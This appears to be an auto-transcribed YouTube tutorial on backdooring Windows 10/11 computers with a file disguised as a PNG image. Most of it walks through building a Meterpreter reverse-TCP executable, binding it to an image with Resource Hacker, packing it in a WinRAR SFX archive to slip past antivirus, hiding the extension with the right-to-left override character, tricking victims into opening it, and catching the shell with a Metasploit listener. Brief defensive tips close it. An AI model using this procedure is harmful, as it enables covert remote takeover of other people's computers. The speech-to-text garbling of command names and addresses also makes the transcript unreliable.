This channel does not promote or encourage any illegal activities. All contents provided by this channel is meant for educational purpose only. Welcome to my YouTube channel. Today we're going to explore a somewhat worrying technique: how to access a Windows 10 or 11 computer using a simple PNG image. Are you ready to dive into the world of cybersecurity and social engineering? So, get ready because we are going to detail each step of this method. First step: creating the backdoor with msfenum. Use the msfenum command to generate a payload specific to your objective. For example, msfenum p Windows metaperator reverse _ TCP lost your local IPLPORT your local port fx greater than tekken.exe. The command instructs msfenum to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type.exe, and the local host LOST and local port LPORT have to be defined. In our case, the LOST is the IP address of our attacking Kali Linux machine and the LPORT is the port to listen on for a connection from the target once it has been compromised. To obtain our IP address, we use the ifconfig command within Kali, specifying the interface as eth0 since we are on Ethernet. Transfer the backdoor file, for example, tekken.exe, to the target machine. This can be done via a download link, email, or any other means of file transfer. Changing the image extension. Use an online converter to change the extension of your JPG image to ICO. This can be done simply by downloading the JPG image and converting it to ICO. Sending the backdoor to the victim machine. Transfer the backdoor file, for example, tekken.exe, to the target machine. This can be done via a download link, email, or any other means of file transfer. Downloading the backdoor by the victim. The victim, tricked by the lure, downloads the backdoor file to their machine. The user may be tricked into opening the file by an appropriate social engineering technique. Using Resource Hacker. Using Resource Hacker is a resource editor for 32 and 64-bit Windows applications to create executable files with different extensions, for example a CR, X, etc. by first adding the backdoor code and then the image JPG to display finally saves them as an executable file with the extension X. Using WinRAR. Finally, we will use the famous WinRAR to create a self-extracting archive, SFX, of WinRAR to install backdoors in an undetectable way. For SFX archives, WinRAR offers advanced options such as the ability to run commands before and after installation, and overwrite all existing files or directories in the target directory. The attack does not require the target user to have WinRAR or other compression software, as SFX files are designed to give access to content to those users as well. SFX archives have been used for legitimate purposes for a long time. Security detections may not detect malicious features hidden in these archives. Changing the file extension with the RLO character. Use the right to left override RLO character to hide the file extension. For example, rename tekken.exe to yprcs.png by reversing the order of the characters. This can fool malicious file detection systems. You can change the first two letters if you want. Configuring the payload manager with MSF console. We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit, using the command msf console on the Kali Linux terminal. First, we'll tell Metasploit to use the generic payload handler multi-handler using the command use multi-handler. We will then set the payload to match the one set within the executable using the command set payload Windows metaperator reverse _ TCP. We will then set the LOST and LPORT this way. Set LHOST 192, the 17th of January 168 and set LPORT 4444. Once done, type run J or exploit J and press enter. Payload execution. When the victim opens the malicious file, the backdoor runs silently in the background, establishing a connection with your Kali Linux machine. You can now interact with the target machine through the metaprether session. By following these steps carefully, you can access a Windows 10 or 11 computer discreetly and undetected, using a simple PNG image as a decoy. Always remember to obey the laws and use this knowledge for ethical and legal purposes. As a responsible user, it's crucial to understand how to defend against such attacks and mitigate risks. Here are some countermeasures and solutions. Education and awareness. Make users aware of social engineering tactics and the dangers of downloading and opening files from untrusted sources. Regular training on cybersecurity best practices can help users recognize and avoid potential threats. Security software. Install and regularly update antivirus and anti-malware software on all devices. These programs can detect and remove known malicious files and behaviors. Firewalls. Make sure firewalls are properly configured on the network and on individual devices to monitor and block suspicious network traffic. File extensions. Train users to pay attention to file extensions and verify the authenticity of files before opening them. Renaming files to hide their true nature is a common tactic used by attackers. Patch management. Keep operating systems and software up to date with the latest security patches and updates. Many vulnerabilities exploited by attackers are patched by software companies once discovered. Legal and ethical considerations. Always act within the bounds of the law and ethical guidelines. Engaging in unauthorized access to computer systems is illegal and unethical, regardless of intent. This method, although technically complex, demonstrates how a simple image can be used as an attack vector to compromise a Windows system. Stay with us to discover more IT security techniques and tips on our channel, and don't forget to subscribe so you don't miss our next videos.